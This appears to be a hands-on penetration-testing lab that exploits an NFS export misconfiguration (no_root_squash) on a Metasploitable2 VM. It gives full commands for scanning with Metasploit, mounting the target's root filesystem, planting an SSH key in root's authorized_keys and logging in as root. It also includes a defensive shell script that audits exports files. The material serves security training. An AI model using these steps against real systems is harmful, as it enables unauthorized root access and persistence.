Exploiting NFS Misconfiguration

Beginner

Introduction

Network File System (NFS) is a distributed file system protocol that allows users to access remote files as if they were local. However, improper configuration of NFS can lead to severe security vulnerabilities, allowing attackers to gain unauthorized access to the system. In this lab, you will learn how to exploit NFS misconfiguration to gain root access to a target machine.

The goal of this lab is to understand the risks associated with NFS misconfiguration and learn how to perform a successful NFS-based attack. By the end of the lab, you will have gained hands-on experience in identifying NFS shares, mounting them locally, and leveraging the misconfiguration to obtain root privileges on the target system.

Scan for NFS Shares

In this step, you will use the Metasploit Framework to scan the target machine for NFS shares.

Now you will start the attack machine (Kali Linux container) and the target machine (Metasploitable2 virtual machine) for the experiment.

  1. Open an xfce terminal on the LabEx host machine and start the Metasploitable2 target by running the following command:
sudo virsh start Metasploitable2

  2. Test the connectivity to the target machine by pinging it:
ping 192.168.122.102

Press Ctrl+C to stop the ping.

  3. Launch the Kali Linux container and enter the bash environment by running:
docker run -ti --network host --privileged b5b709a49cd5 bash

Note the extra --privileged parameter. It is used so that root inside the container has real root privileges on the host; without it, the container's root is effectively an unprivileged user as far as the host kernel is concerned and cannot, for example, perform a mount. Starting a container with --privileged lets you see many of the host's devices, mount filesystems (which this lab needs for the NFS share), and even run Docker containers inside the container.

  4. Inside the Kali container, test the network connection to the target machine:
ping 192.168.122.102

Press Ctrl+C to stop the ping.

Now both the attack machine and the target machine are running, and you can start the penetration testing.

  5. Now, launch the Metasploit console:
cd ~
msfconsole

  6. In the Metasploit console, use the auxiliary/scanner/nfs/nfsmount module to scan for NFS shares:
use auxiliary/scanner/nfs/nfsmount
set rhosts 192.168.122.102
set threads 5
show options
exploit

This module will scan the target system and display any exported NFS shares.

Press Ctrl+D to quit the Metasploit console, then move on to the next step.

Mount the NFS Share

In this step, you will mount the NFS root share on the Kali container.

First, install the nfs-common package:

cd /
apt-get install -y nfs-common

Mount the NFS root share:

mount -t nfs -o nolock 192.168.122.102:/ /mnt

This command will mount the target system's root directory (/) to the /mnt directory on the Kali container.

Verify that the NFS share is mounted correctly by listing the contents of the /mnt directory:

ls /mnt

You should see the contents of the target system's root directory.

Create SSH Key Pair

In this step, you will create an SSH key pair to enable passwordless SSH access to the target system.

Generate an SSH key pair:

ssh-keygen -t rsa -b 4096 -f /root/.ssh/id_rsa

This command will create two files: /root/.ssh/id_rsa (private key) and /root/.ssh/id_rsa.pub (public key).

Enable Passwordless SSH Access

In this step, you will add the public key to the target system's authorized keys file, enabling passwordless SSH access.

Copy the public key to the target system's authorized keys file:

cat /root/.ssh/id_rsa.pub >> /mnt/root/.ssh/authorized_keys

This command will append the contents of your public key file to the /root/.ssh/authorized_keys file on the target system. The write succeeds only because the export does not squash root: the server treats the container's root user (uid 0) as its own root, so it can modify a directory that is otherwise readable and writable only by root. An export with root_squash would have mapped your uid 0 to the unprivileged nobody user and the append would have been refused.
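The mount and the authorized_keys append above both depend on the same server-side settings: the root filesystem is exported, any host may mount it, it is writable, and client root is not squashed. The following POSIX shell function is an added defender-side check that is not part of the lab or of LabEx's materials; it audits an /etc/exports file for exactly those patterns, plus the classic "host (options)" mistake where a space before the parentheses applies the options to every host. The function name audit_exports and the sample exports content are constructed for this example; the lab's own target is not inspected.

```shell
#!/bin/sh
# Added example (not part of the lab): audit an NFS exports file for the
# settings that make the attack in this lab possible. The file contents
# below are constructed for the example.

# audit_exports FILE
# Prints one line per risky setting, as "PATH HOST: reason".
# Always returns 0; callers count the output lines.
audit_exports() {
    file="$1"
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in
            ''|'#'*) continue ;;                 # skip blank lines and comments
        esac
        set -f                                   # no globbing of "*(rw,...)"
        set -- $line                             # path, then host(option) entries
        set +f
        path="$1"
        shift
        for spec in "$@"; do
            host="${spec%%(*}"                   # text before the first "("
            if [ "$spec" = "$host" ]; then
                opts=""                          # no "(...)": default options (ro)
            else
                opts="${spec#*(}"
                opts="${opts%)}"
            fi
            shown="${host:-*}"
            if [ "$path" = "/" ]; then
                echo "$path $shown: exports the whole root filesystem"
            fi
            if [ -z "$host" ]; then
                # "host (opts)": the space makes the options apply to every host
                echo "$path $shown: options separated from the host by a space apply to every host"
            elif [ "$host" = "*" ]; then
                echo "$path $shown: exported to every host"
            fi
            case ",$opts," in
                *,no_root_squash,*)
                    echo "$path $shown: no_root_squash lets a client root user act as root on the server" ;;
            esac
            case ",$opts," in
                *,rw,*) echo "$path $shown: writable (rw)" ;;
            esac
        done
    done < "$file"
    return 0
}

# Constructed sample: line 1 is the pattern this lab exploits, line 2 is a
# hardened export that produces no findings, line 3 shows the space mistake.
sample="$(mktemp)"
cat > "$sample" <<'EOF'
# constructed sample exports file
/           *(rw,sync,no_root_squash,no_subtree_check)
/srv/share  10.0.0.0/24(ro,sync,root_squash)
/home       192.168.1.5 (rw)
EOF
audit_exports "$sample"
rm -f "$sample"
```

Run it against a real server with `audit_exports /etc/exports`; an empty result means none of the four patterns is present. The hardened line in the sample shows the shape to aim for: a specific subnet, ro where possible, and root_squash (the default) left in place.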

Gain Root Access

In this step, you will use the passwordless SSH access to log in as the root user on the target system.

Connect to the target system using SSH:

ssh -o HostKeyAlgorithms=ssh-rsa,ssh-dss root@192.168.122.102

You should now have a root shell on the target system without being prompted for a password. The HostKeyAlgorithms option is needed because the target's old OpenSSH server only offers ssh-rsa and ssh-dss host keys, which current SSH clients refuse by default.

Summary

In this lab, you learned how to exploit NFS misconfiguration to gain unauthorized root access to a target system. You started by scanning for NFS shares using the Metasploit Framework, then mounted the NFS root share on your local machine. Next, you created an SSH key pair and added the public key to the target system's authorized keys file, enabling passwordless SSH access. Finally, you used the passwordless SSH access to log in as the root user on the target system.

This lab demonstrated the importance of properly configuring NFS shares and the potential risks associated with misconfiguration. By understanding these vulnerabilities, you can better secure your systems and protect against potential attacks.
